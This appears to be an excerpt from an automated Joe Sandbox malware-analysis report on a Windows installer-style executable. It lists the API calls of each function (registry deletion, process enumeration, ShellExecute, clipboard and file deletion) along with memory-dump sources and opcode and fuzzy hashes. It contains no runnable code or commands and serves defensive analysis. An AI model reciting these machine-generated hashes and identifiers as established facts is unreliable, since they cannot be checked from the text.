                      • Part of subcall function 004060CA: GetVersion.KERNEL32(00447D88,?,00000000,00404AAA,00447D88,00000000,00423179,771B23A0,00000000), ref: 0040619B
                    • GlobalFree.KERNEL32(007B9B50), ref: 00402139
                    Memory Dump Source
                    • Source File: 00000000.00000002.1252775681.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.1252749132.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1252789647.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1252803341.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1252803341.000000000041E000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1252803341.0000000000432000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1252803341.0000000000469000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1252887645.00000000004FD000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1252887645.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1252887645.0000000000541000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_wWk9NkXYcL.jbxd
                    Similarity
                    • API ID: Global$AllocFreeVersion
                    • String ID: FerryTrioStomachElectionRoute
                    • API String ID: 2385019812-1160383050
                    • Opcode ID: 442295020a8ec9c410d593e6b55dbcb69a0d183c26179685e54f734f8a1201cf
                    • Instruction ID: 6b75c97ebfe45aa80d571dd756fbca19e350de1e8d26625c3d1a57f244ee0343
                    • Opcode Fuzzy Hash: 442295020a8ec9c410d593e6b55dbcb69a0d183c26179685e54f734f8a1201cf
                    • Instruction Fuzzy Hash: 502102316442159BE720DF588A40B6F73A8FF08758B10413BE942B72D0C7B8D851AB9E

                    Control-flow Graph
                    (graph image not reproduced; the executed / not-executed colouring did not survive extraction)
                    • Function 0040248E, blocks 40248e-4024f3 plus 401721-401728, exiting to 402c58-402c67; subcalls 0040145C, 0040154D, 00401497; API nodes RegDeleteValueW, RegCloseKey (see APIs below)
                    APIs
                      • Part of subcall function 0040154D: RegOpenKeyExW.KERNELBASE(?,00000000,00000000,?,?), ref: 00401587
                    • RegDeleteValueW.KERNELBASE(00000000,00000000), ref: 004024AF
                    • RegCloseKey.ADVAPI32(00000000), ref: 004024B8
                    Memory Dump Source
                    • Source File: 00000000.00000002.1252775681.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.1252749132.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1252789647.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1252803341.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1252803341.000000000041E000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1252803341.0000000000432000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1252803341.0000000000469000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1252887645.00000000004FD000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1252887645.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1252887645.0000000000541000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_wWk9NkXYcL.jbxd
                    Similarity
                    • API ID: CloseDeleteOpenValue
                    • String ID:
                    • API String ID: 849931509-0

                    Control-flow Graph (node colours mark Executed / Not Executed blocks; graph of the function at 40139b not reproduced)
                    APIs
                    • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013F6
                    • SendMessageW.USER32(00000402,00000402,00000000), ref: 00401406
                    Similarity
                    • API ID: MessageSend
                    • String ID:
                    • API String ID: 3850602802-0

                    Control-flow Graph (node colours mark Executed / Not Executed blocks; graph of the function at 4058fe not reproduced)
                    APIs
                    • GetFileAttributesW.KERNELBASE(00000003,0040315B,004E80D8,80000000,00000003,?,?,?,00000000,004035D7,?), ref: 00405902
                    • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,004035D7,?), ref: 00405924
                    Similarity
                    • API ID: File$AttributesCreate
                    • String ID:
                    • API String ID: 415043291-0

                    Control-flow Graph (node colours mark Executed / Not Executed blocks; graph of the function at 4058de not reproduced)
                    APIs
                    • GetFileAttributesW.KERNELBASE(?,00406701,?,?,?), ref: 004058E2
                    • SetFileAttributesW.KERNEL32(?,00000000), ref: 004058F5
                    Similarity
                    • API ID: AttributesFile
                    • String ID:
                    • API String ID: 3188754299-0

                    Control-flow Graph (node colours mark Executed / Not Executed blocks; graph of the function at 401f9b not reproduced)
                    APIs
                    • ShellExecuteW.SHELL32(?,00000000,?,00000000,004D40B0,00000000), ref: 00401FEA
                    Similarity
                    • API ID: ExecuteShell
                    • String ID:
                    • API String ID: 587946157-0
                    APIs
                    • RegOpenKeyExW.KERNELBASE(?,00000000,00000000,?,?), ref: 00401587
                    Similarity
                    • API ID: Open
                    • String ID:
                    • API String ID: 71445658-0
                    APIs
                    • SearchPathW.KERNELBASE(00000000,00000000,00000000,00002004,?,?), ref: 004018A4
                    Similarity
                    • API ID: PathSearch
                    • String ID:
                    • API String ID: 2203818243-0
                    APIs
                    • ReadFile.KERNELBASE(00000000,00000000,00000000,00000000,000000FF,?,00402F3A,000000FF,00000004,00000000,00000000,00000000), ref: 00402EB5
                    Similarity
                    • API ID: FileRead
                    • String ID:
                    • API String ID: 2738559852-0
                    APIs
                      • Part of subcall function 00405AE7: CharNextW.USER32(?,*?|<>/":,00000000,004E00C8,004CC0A0,004E00C8,00000000,0040336C,004E00C8,00000002,0040359B), ref: 00405B4A
                      • Part of subcall function 00405AE7: CharNextW.USER32(?,?,?,00000000), ref: 00405B59
                      • Part of subcall function 00405AE7: CharNextW.USER32(?,004E00C8,004CC0A0,004E00C8,00000000,0040336C,004E00C8,00000002,0040359B), ref: 00405B5E
                      • Part of subcall function 00405AE7: CharPrevW.USER32(?,?,004CC0A0,004E00C8,00000000,0040336C,004E00C8,00000002,0040359B), ref: 00405B72
                    • CreateDirectoryW.KERNELBASE(004E00C8,00000000,004E00C8,004E00C8,004E00C8,00000002,0040359B), ref: 00403381
                    Similarity
                    • API ID: Char$Next$CreateDirectoryPrev
                    • String ID:
                    • API String ID: 4115351271-0
                    APIs
                    • SetFilePointer.KERNELBASE(00000000,00000000,00000000,004032EE,?,?,?,?,00000000,004035D7,?), ref: 00402EDE
                    Similarity
                    • API ID: FilePointer
                    • String ID:
                    • API String ID: 973152223-0
                    APIs
                    • Sleep.KERNELBASE(00000000), ref: 00401656
                    Similarity
                    • API ID: Sleep
                    • String ID:
                    • API String ID: 3472027048-0
                    APIs
                    • CloseHandle.KERNELBASE(FFFFFFFF,00403659,?), ref: 004033F6
                    Similarity
                    • API ID: CloseHandle
                    • String ID:
                    • API String ID: 2962429428-0
                    APIs
                    • GlobalAlloc.KERNEL32(00000040,00000FA0), ref: 00405C83
                    • lstrlenW.KERNEL32(?), ref: 00405C90
                    • GetVersionExW.KERNEL32(?), ref: 00405CEE
                      • Part of subcall function 00405ADA: CharUpperW.USER32(?,00405CC5,?), ref: 00405AE0
                    • LoadLibraryA.KERNEL32(PSAPI.DLL), ref: 00405D2D
                    • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 00405D4C
                    • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 00405D56
                    • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 00405D61
                    • FreeLibrary.KERNEL32(00000000), ref: 00405D98
                    • GlobalFree.KERNEL32(?), ref: 00405DA1
                    Strings
                    Similarity
                    • API ID: AddressProc$FreeGlobalLibrary$AllocCharLoadUpperVersionlstrlen
                    • String ID: CreateToolhelp32Snapshot$EnumProcessModules$EnumProcesses$GetModuleBaseNameW$Kernel32.DLL$Module32FirstW$Module32NextW$PSAPI.DLL$Process32FirstW$Process32NextW$Unknown
                    • API String ID: 20674999-2124804629
                    APIs
                    • GetDlgItem.USER32(?,000003F9), ref: 00404494
                    • GetDlgItem.USER32(?,00000408), ref: 004044A1
                    • GlobalAlloc.KERNEL32(00000040,?), ref: 004044F0
                    • LoadBitmapW.USER32(0000006E), ref: 00404503
                    • SetWindowLongW.USER32(?,000000FC,Function_000043CD), ref: 0040451D
                    • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 0040452F
                    • ImageList_AddMasked.COMCTL32(00000000,?,00FF00FF), ref: 00404543
                    • SendMessageW.USER32(?,00001109,00000002), ref: 00404559
                    • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404565
                    • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404575
                    • DeleteObject.GDI32(?), ref: 0040457A
                    • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 004045A5
                    • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 004045B1
                    • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404652
                    • SendMessageW.USER32(?,0000110A,00000003,00000110), ref: 00404675
                    • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404686
                    • GetWindowLongW.USER32(?,000000F0), ref: 004046B0
                    • SetWindowLongW.USER32(?,000000F0,00000000), ref: 004046BF
                    • ShowWindow.USER32(?,00000005), ref: 004046D0
                    • SendMessageW.USER32(?,00000419,00000000,?), ref: 004047CE
                    • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 00404829
                    • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 0040483E
                    • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00404862
                    • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00404888
                    • ImageList_Destroy.COMCTL32(?), ref: 0040489D
                    • GlobalFree.KERNEL32(?), ref: 004048AD
                    • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 0040491D
                    • SendMessageW.USER32(?,00001102,?,?), ref: 004049CB
                    • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 004049DA
                    • InvalidateRect.USER32(?,00000000,00000001), ref: 004049FA
                    • ShowWindow.USER32(?,00000000), ref: 00404A4A
                    • GetDlgItem.USER32(?,000003FE), ref: 00404A55
                    • ShowWindow.USER32(00000000), ref: 00404A5C
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1252775681.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.1252749132.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1252789647.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1252803341.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1252803341.000000000041E000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1252803341.0000000000432000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1252803341.0000000000469000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1252887645.00000000004FD000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1252887645.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1252887645.0000000000541000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_wWk9NkXYcL.jbxd
                    Similarity
                    • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                    • String ID: $ @$M$N
                    • API String ID: 1638840714-3479655940
                    • Opcode ID: 937356102a75185e20c66d4cdea0a1291c72136f879f0bdf363495dfedd26f78
                    • Instruction ID: b4b482d55b4410d1430187b36ccef83e55c8bda0955db637de4799104be70721
                    • Opcode Fuzzy Hash: 937356102a75185e20c66d4cdea0a1291c72136f879f0bdf363495dfedd26f78
                    • Instruction Fuzzy Hash: 5F027BB0900209EFDB119FA4CD45AAEBBB5FB84315F10813AF614B62E0D7799E91CF58
                    APIs
                    • GetDlgItem.USER32(?,00000403), ref: 00404C16
                    • GetDlgItem.USER32(?,000003EE), ref: 00404C25
                    • GetClientRect.USER32(?,?), ref: 00404C62
                    • GetSystemMetrics.USER32(00000015), ref: 00404C6A
                    • SendMessageW.USER32(?,00001061,00000000,00000002), ref: 00404C8B
                    • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 00404C9C
                    • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 00404CAF
                    • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 00404CBD
                    • SendMessageW.USER32(?,00001024,00000000,?), ref: 00404CD0
                    • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 00404CF2
                    • ShowWindow.USER32(?,00000008), ref: 00404D06
                    • GetDlgItem.USER32(?,000003EC), ref: 00404D27
                    • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 00404D37
                    • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 00404D4C
                    • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 00404D58
                    • GetDlgItem.USER32(?,000003F8), ref: 00404C34
                      • Part of subcall function 00403920: SendMessageW.USER32(00000028,?,00000001,00405280), ref: 0040392E
                    • GetDlgItem.USER32(?,000003EC), ref: 00404D77
                    • CreateThread.KERNEL32(00000000,00000000,Function_00004B48,00000000), ref: 00404D85
                    • CloseHandle.KERNEL32(00000000), ref: 00404D8C
                    • ShowWindow.USER32(00000000), ref: 00404DB3
                    • ShowWindow.USER32(?,00000008), ref: 00404DB8
                    • ShowWindow.USER32(00000008), ref: 00404DFF
                    • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00404E31
                    • CreatePopupMenu.USER32 ref: 00404E42
                    • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 00404E57
                    • GetWindowRect.USER32(?,?), ref: 00404E6A
                    • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 00404E8C
                    • SendMessageW.USER32(?,00001073,00000000,?), ref: 00404EC7
                    • OpenClipboard.USER32(00000000), ref: 00404ED7
                    • EmptyClipboard.USER32 ref: 00404EDD
                    • GlobalAlloc.KERNEL32(00000042,00000000,?,?,00000000,?,00000000), ref: 00404EE9
                    • GlobalLock.KERNEL32(00000000), ref: 00404EF3
                    • SendMessageW.USER32(?,00001073,00000000,?), ref: 00404F07
                    • GlobalUnlock.KERNEL32(00000000), ref: 00404F29
                    • SetClipboardData.USER32(0000000D,00000000), ref: 00404F34
                    • CloseClipboard.USER32 ref: 00404F3A
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1252775681.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.1252749132.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1252789647.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1252803341.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1252803341.000000000041E000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1252803341.0000000000432000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1252803341.0000000000469000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1252887645.00000000004FD000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1252887645.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1252887645.0000000000541000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_wWk9NkXYcL.jbxd
                    Similarity
                    • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                    • String ID: {
                    • API String ID: 590372296-366298937
                    • Opcode ID: 17b19512de00e59187fca8f5a6567c7c37cbdab995639fd4f0823fef6f6269fe
                    • Instruction ID: 4a1b14a679f192c254d8bf3bd6cec492735fc4b3fb0f93a90a805189e19306d7
                    • Opcode Fuzzy Hash: 17b19512de00e59187fca8f5a6567c7c37cbdab995639fd4f0823fef6f6269fe
                    • Instruction Fuzzy Hash: FBB15CB0900208BFDB11AF60DD89EAE7B79FF44355F00817AFA45B61A1CB748A91DF58
                    APIs
                    • GetDlgItem.USER32(?,000003FB), ref: 0040405A
                    • SetWindowTextW.USER32(?,?), ref: 00404087
                    • SHBrowseForFolderW.SHELL32(?), ref: 0040413F
                    • CoTaskMemFree.OLE32(00000000), ref: 0040414A
                    • lstrcmpiW.KERNEL32(LimePhillips,0044FD98,00000000,?,?), ref: 0040417C
                    • SetDlgItemTextW.USER32(?,000003FB,?), ref: 00404198
                    • lstrcatW.KERNEL32(?,LimePhillips), ref: 00404188
                      • Part of subcall function 00405731: GetDlgItemTextW.USER32(00000001,00000001,00002004,00403AE8), ref: 00405744
                      • Part of subcall function 00405AE7: CharNextW.USER32(?,*?|<>/":,00000000,004E00C8,004CC0A0,004E00C8,00000000,0040336C,004E00C8,00000002,0040359B), ref: 00405B4A
                      • Part of subcall function 00405AE7: CharNextW.USER32(?,?,?,00000000), ref: 00405B59
                      • Part of subcall function 00405AE7: CharNextW.USER32(?,004E00C8,004CC0A0,004E00C8,00000000,0040336C,004E00C8,00000002,0040359B), ref: 00405B5E
                      • Part of subcall function 00405AE7: CharPrevW.USER32(?,?,004CC0A0,004E00C8,00000000,0040336C,004E00C8,00000002,0040359B), ref: 00405B72
                    • GetDiskFreeSpaceW.KERNEL32(00443D80,?,?,0000040F,?,00443D80,00443D80,?,00000000,00443D80,?,?,000003FB,?), ref: 0040425A
                    • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404275
                    • SetDlgItemTextW.USER32(00000000,00000400,0040856C), ref: 004042EE
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1252775681.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.1252749132.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1252789647.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1252803341.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1252803341.000000000041E000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1252803341.0000000000432000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1252803341.0000000000469000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1252887645.00000000004FD000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1252887645.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1252887645.0000000000541000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_wWk9NkXYcL.jbxd
                    Similarity
                    • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpi
                    • String ID: A$LimePhillips
                    • API String ID: 2246997448-475300666
                    • Opcode ID: 6589979ff9a501fc495b169141efcf5f2177152b764b6bcc2381f6d8f6a68418
                    • Instruction ID: 82e0f664371878e3f8136284ca2467dd10f3df84af4d3fe89a4ee6e4629e8810
                    • Opcode Fuzzy Hash: 6589979ff9a501fc495b169141efcf5f2177152b764b6bcc2381f6d8f6a68418
                    • Instruction Fuzzy Hash: 91A181B1A00208ABDB11AFA1C885AAF7BB8EF44314F10407FFA05B72D1D77C9A419F59
                    APIs
                    • DeleteFileW.KERNEL32(?,?,004E00C8), ref: 00406578
                    • lstrcatW.KERNEL32(00465470,\*.*,00465470,?,004CC0A0,00000002,?,004E00C8), ref: 004065C8
                    • lstrcatW.KERNEL32(?,004082C8,?,00465470,?,004CC0A0,00000002,?,004E00C8), ref: 004065E8
                    • lstrlenW.KERNEL32(?), ref: 004065EB
                    • FindFirstFileW.KERNEL32(00465470,?), ref: 004065FF
                    • FindNextFileW.KERNEL32(00000000,00000010,000000F2,?), ref: 004066B5
                    • FindClose.KERNEL32(00000000), ref: 004066C6
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1252775681.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.1252749132.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1252789647.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1252803341.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1252803341.000000000041E000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1252803341.0000000000432000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1252803341.0000000000469000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1252887645.00000000004FD000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1252887645.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1252887645.0000000000541000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_wWk9NkXYcL.jbxd
                    Similarity
                    • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                    • String ID: \*.*$pTF
                    • API String ID: 2035342205-2155356189
                    • Opcode ID: 4d656ded0a8bf8375e6a0408538251f1fecec283f47e8baec3b74e355d12da64
                    • Instruction ID: cb8e43480c0494b88bcdaab5263094abc6d8a088fa6e5b396f43e0b3f7cdc2f6
                    • Opcode Fuzzy Hash: 4d656ded0a8bf8375e6a0408538251f1fecec283f47e8baec3b74e355d12da64
                    • Instruction Fuzzy Hash: ED51B170800618AACF20AB35CD45A6B7768EF40358F12893BB857761D2DB3D8DA1CB5D
                    APIs
                    • CoCreateInstance.OLE32(00408AEC,00000000,00000001,00408ACC,?,00000000), ref: 00402272
                    Memory Dump Source
                    • Source File: 00000000.00000002.1252775681.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.1252749132.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1252789647.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1252803341.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1252803341.000000000041E000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1252803341.0000000000432000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1252803341.0000000000469000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1252887645.00000000004FD000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1252887645.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1252887645.0000000000541000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_wWk9NkXYcL.jbxd
                    Similarity
                    • API ID: CreateInstance
                    • String ID:
                    • API String ID: 542301482-0
                    • Opcode ID: b89fa3b0e8c371e7ca3b560dfc137a163ff1d9034affe8bcb8ea131d3c401b1a
                    • Instruction ID: b8756f995b5f19bf65138570f0328ac05a5921d347238761232d12e19ef7feba
                    • Opcode Fuzzy Hash: b89fa3b0e8c371e7ca3b560dfc137a163ff1d9034affe8bcb8ea131d3c401b1a
                    • Instruction Fuzzy Hash: 2C414679A00204AFCB04EFA4C988E9E7B79EF48314F20456AF915EB3E1CB79D941CB54
                    APIs
                    • FindFirstFileW.KERNEL32(00000000,?), ref: 00402A01
                    Memory Dump Source
                    • Source File: 00000000.00000002.1252775681.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.1252749132.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1252789647.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1252803341.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1252803341.000000000041E000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1252803341.0000000000432000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1252803341.0000000000469000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1252887645.00000000004FD000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1252887645.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1252887645.0000000000541000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_wWk9NkXYcL.jbxd
                    Similarity
                    • API ID: FileFindFirst
                    • String ID:
                    • API String ID: 1974802433-0
                    • Opcode ID: 2942623f6c0277285390027b9d18840a489366ce0a7cc68cdc812ca0f05454fe
                    • Instruction ID: 400e5e0b203cfa4d99e013a63ed7a258bcbaee981441f5d34274aa4bdee23deb
                    • Opcode Fuzzy Hash: 2942623f6c0277285390027b9d18840a489366ce0a7cc68cdc812ca0f05454fe
                    • Instruction Fuzzy Hash: 6AE065716042109BE710E778AD89AAF226CDF41328B100677E116F50D1E67889819B1D
                    Memory Dump Source
                    • Source File: 00000000.00000002.1252775681.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.1252749132.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1252789647.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1252803341.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1252803341.000000000041E000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1252803341.0000000000432000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1252803341.0000000000469000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1252887645.00000000004FD000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1252887645.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1252887645.0000000000541000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_wWk9NkXYcL.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 3db9e2985b9a95f07b4948d92816868b6eb93f1de1133e87cfb4c0131ea940ae
                    • Instruction ID: 195f9c0d2d2971c704648993b79f5dd0ea752a0e03b98457dcbfca0f5118a9d4
                    • Opcode Fuzzy Hash: 3db9e2985b9a95f07b4948d92816868b6eb93f1de1133e87cfb4c0131ea940ae
                    • Instruction Fuzzy Hash: D2E16D71D04214DFCF18CF58D880AADB7F1AF45305F1981ABE856AF286D738AA50CF55
                    Memory Dump Source
                    • Source File: 00000000.00000002.1252775681.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.1252749132.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1252789647.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1252803341.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1252803341.000000000041E000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1252803341.0000000000432000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1252803341.0000000000469000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1252887645.00000000004FD000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1252887645.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1252887645.0000000000541000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_wWk9NkXYcL.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 06c75ba6eb7b1da5beda44bb12a349235cc55abe98431d1e410fa8ae9787adfe
                    • Instruction ID: 00c1500383e690738851ed547f8828f465c8dec40552374253bbad03b7333b94
                    • Opcode Fuzzy Hash: 06c75ba6eb7b1da5beda44bb12a349235cc55abe98431d1e410fa8ae9787adfe
                    • Instruction Fuzzy Hash: 59C15C72A012698FCF18DF68C9805ED7BA2FF89314B16812AEC56A7384D734EC55CF84
                    APIs
                    • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00404F81
                    • ShowWindow.USER32(?), ref: 00404F9E
                    • DestroyWindow.USER32 ref: 00404FB2
                    • SetWindowLongW.USER32(?,00000000,00000000), ref: 00404FCE
                    • GetDlgItem.USER32(?,?), ref: 00404FEF
                    • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00405003
